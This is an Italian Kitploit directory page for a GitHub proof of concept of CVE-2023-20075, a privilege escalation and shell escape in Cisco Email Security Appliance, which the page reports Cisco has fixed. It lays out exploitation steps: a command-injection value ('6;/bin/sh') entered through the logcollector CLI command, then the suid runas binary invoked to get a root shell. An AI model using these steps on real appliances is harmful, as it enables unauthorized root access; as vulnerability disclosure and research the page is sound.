Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cisco-CVE-2023-20075 — Cisco Email Security Appliance: Escalation dei Privilegi Locale e Fuga dalla Shell | Kitploit
Strumenti/GitHubGitHub/ly1g3/cisco-cve-2023-20075
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPost-ExploitPenetration TestingRed Teaming
GitHubly1g3/cisco-cve-2023-20075

cisco-CVE-2023-20075

Cisco Email Security Appliance: Escalation dei Privilegi Locale e Fuga dalla Shell

Vedi Repository
112 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Informazioni

Ricercatore di sicurezza: ly1g3, ly1g3[at]tuta.io

Impronta GPG: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

Panoramica: Escalation dei privilegi locali e shell escape

CVE: CVE-2023-20075

Cronologia:

  • Scoperto - ly1g3
  • Segnalato - ly1g3
  • Risolto - Cisco

Cisco AsyncOS 14.2.0

ESA (Cisco Secure Email)

Escalation dei privilegi - dalla cli alla shell di root

Un utente autenticato con accesso alla cli può elevare i privilegi a root ed eseguire codice arbitrario

Passaggi per ottenere la shell

  1. Dalla cli esegui il comando logcollector
  2. Premi 3
  3. Inserisci il valore: 6;/bin/sh
  4. Shell come utente

Passaggi per ottenere root

  1. Dalla shell esegui il binario suid runas
  2. /data/release/phoebe-14*/bin/runas 0 /bin/sh
  3. Shell come root
Scarica lo strumento